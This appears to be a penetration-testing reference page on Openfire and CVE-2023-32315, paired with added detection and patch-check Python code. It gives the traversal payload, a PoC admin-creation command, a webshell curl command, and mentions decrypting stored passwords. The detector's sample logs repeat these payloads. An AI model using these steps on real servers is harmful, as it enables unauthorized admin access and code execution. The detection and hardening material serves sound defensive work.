Openfire (XMPP)
aka xmpp, jabber
Ignite Realtime's XMPP/Jabber server. Admin console on 9090/9091; a 2023 path-traversal auth bypass (CVE-2023-32315) lets you create an admin and upload a malicious plugin for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
| 9090 | tcp | Admin console (HTTP) |
| 9091 | tcp | Admin console (HTTPS) |
| 5222 | tcp | XMPP client-to-server |
| 7070 | tcp | HTTP-bind (BOSH) |
Fingerprint
- Admin console login at /login.jsp, 'Openfire' branding + version
- XMPP banner on 5222
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /opt/openfire/conf/openfire.xml | DB connection, admin console settings | sensitive |
| embedded-db/openfire.script | HSQLDB: admin hash / encrypted passwords | sensitive |
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2023-32315 | Path-traversal auth bypass to the admin console → plugin upload RCE |
Exploitation primitives
- CVE-2023-32315: reach setup/admin pages via /setup/setup-s/..%c0%af.. traversal, add a new admin user
- As admin, upload a malicious .jar plugin (openfire-management-tool) for a webshell / RCE as the openfire user
- Decrypt stored XMPP user passwords from the embedded DB using the AES key in openfire.xml
Overview
Openfire is a Java XMPP/Jabber server. The admin console on 9090/9091 is the way in: CVE-2023-32315 bypasses authentication via path traversal, after which a malicious plugin gives code execution.
Auth bypass → admin (CVE-2023-32315)
Use the PoC to create a new admin account through the traversal:
python3 CVE-2023-32315.py -t http://<TARGET>:9090
It registers a throwaway admin (e.g. username3036:Pass@123) you can log into at /login.jsp.
Plugin RCE
Once logged in as admin, upload the weaponised management plugin under Plugins → Upload Plugin, then browse to it for a shell:
curl "http://<TARGET>:9090/plugins/openfire-management-tool-plugin/cmd.jsp?cmd=id&pass=123"
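The two steps above (traversal through /setup/ to reach admin pages, then a plugin upload that drops cmd.jsp under /plugins/openfire-management-tool-plugin/) leave distinctive traces in admin-console traffic. The following is an added detection example, not code from the page or from the Openfire project: it assumes the console sits behind a reverse proxy that writes Common Log Format (Openfire writes no such log by default), assumes POSTs to /plugin-admin.jsp are where plugin uploads land, and runs over constructed sample lines.

```python
import re
from typing import Iterable, Optional

# Assumed log source: a reverse proxy in front of the admin console writing
# Common Log Format. Openfire itself does not produce such a log by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Dot-dot segments in literal or percent-encoded form, including the
# overlong UTF-8 slash (%c0%af) that the CVE-2023-32315 bypass relies on.
TRAVERSAL_RE = re.compile(r"(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c|%c0%af)", re.I)

# Webshell path named on this page; plugin-admin.jsp is assumed to be the
# endpoint that receives plugin uploads.
WEBSHELL_PREFIX = "/plugins/openfire-management-tool-plugin/"
PLUGIN_ADMIN = "/plugin-admin.jsp"


def parse_line(line: str) -> Optional[dict]:
    """Parse one CLF line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(req: dict) -> Optional[tuple]:
    """Return (severity, rule) for one parsed request, or None if benign."""
    target = req["target"]
    path = target.split("?", 1)[0].lower()
    if path.startswith("/setup/") and TRAVERSAL_RE.search(target):
        return ("high", "traversal through /setup/ (CVE-2023-32315 pattern)")
    if TRAVERSAL_RE.search(target):
        return ("medium", "path traversal attempt")
    if path.startswith("/setup/"):
        # Setup pages should not be requested once installation is complete.
        return ("medium", "setup page requested on an installed server")
    if path == PLUGIN_ADMIN and req["method"] == "POST":
        return ("medium", "plugin management POST (verify who uploaded what)")
    if path.startswith(WEBSHELL_PREFIX):
        return ("high", "known webshell plugin path accessed")
    return None


def analyze(lines: Iterable[str]) -> list:
    """Run every line through the parser and classifier; collect the hits."""
    findings = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        hit = classify(req)
        if hit is not None:
            findings.append({"ip": req["ip"], "time": req["ts"], "severity": hit[0],
                             "rule": hit[1], "target": req["target"]})
    return findings


def high_severity_sources(findings: list) -> set:
    """Client IPs that triggered at least one high-severity rule."""
    return {f["ip"] for f in findings if f["severity"] == "high"}


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2023:10:01:02 +0000] "GET /login.jsp HTTP/1.1" 200 3321',
    '10.0.0.5 - - [12/May/2023:10:01:10 +0000] "POST /login.jsp HTTP/1.1" 302 0',
    '10.0.0.9 - - [12/May/2023:10:01:05 +0000] "GET /setup/setup-s/..%c0%af..%c0%af..%c0%afadmin-page.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/May/2023:10:01:40 +0000] "POST /plugin-admin.jsp HTTP/1.1" 302 0',
    '10.0.0.9 - - [12/May/2023:10:02:01 +0000] "GET /plugins/openfire-management-tool-plugin/cmd.jsp?cmd=id&pass=123 HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:6} {f['ip']:10} {f['rule']}: {f['target']}")
    print("high-severity sources:", high_severity_sources(results))
```

The traversal rule keys on the raw request target rather than a decoded path, because the overlong %c0%af sequence is exactly what a naive decoder normalises away; matching before decoding is what makes the bypass visible. Plugin uploads are flagged at medium only, since legitimate administrators upload plugins too; the point is to correlate them with a preceding /setup/ traversal from the same source.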
Hardening
Patch to ≥ 4.7.5 / 4.6.8, restrict the admin console to trusted networks, and rotate any XMPP passwords stored in the embedded DB.
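The patch threshold above is branch-specific (4.6.8 on the 4.6 line, 4.7.5 on the 4.7 line), which a plain numeric comparison gets wrong. The following is an added example, not code from the page or from Openfire, that codifies the check against a version string taken from the login page or banner; it assumes that release lines newer than 4.7 carry the fix and that lines older than 4.6 never received it.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Fixed releases as given on this page, keyed by release line.
FIXED = {(4, 6): (4, 6, 8), (4, 7): (4, 7, 5)}


def parse_version(text: str) -> Optional[Version]:
    """Extract the first x.y.z version from banner or login-page text, e.g. 'Openfire 4.7.4'."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    return tuple(int(x) for x in m.groups()) if m else None  # type: ignore[return-value]


def is_patched(version: Version) -> bool:
    """True if this version is at or beyond the fixed release for its line."""
    line = (version[0], version[1])
    if line in FIXED:
        return version >= FIXED[line]
    # Assumption: lines newer than 4.7 postdate the fix; lines older than 4.6
    # were never fixed and should be treated as vulnerable.
    return line > (4, 7)


def assess(banner: str) -> str:
    """Human-readable verdict for a banner string; 'unknown' if no version is found."""
    v = parse_version(banner)
    if v is None:
        return "unknown"
    return "patched" if is_patched(v) else "VULNERABLE (CVE-2023-32315)"


if __name__ == "__main__":
    for sample in ("Openfire 4.7.4", "Openfire 4.6.8", "Openfire 4.8.0", "Openfire"):
        print(f"{sample!r}: {assess(sample)}")
```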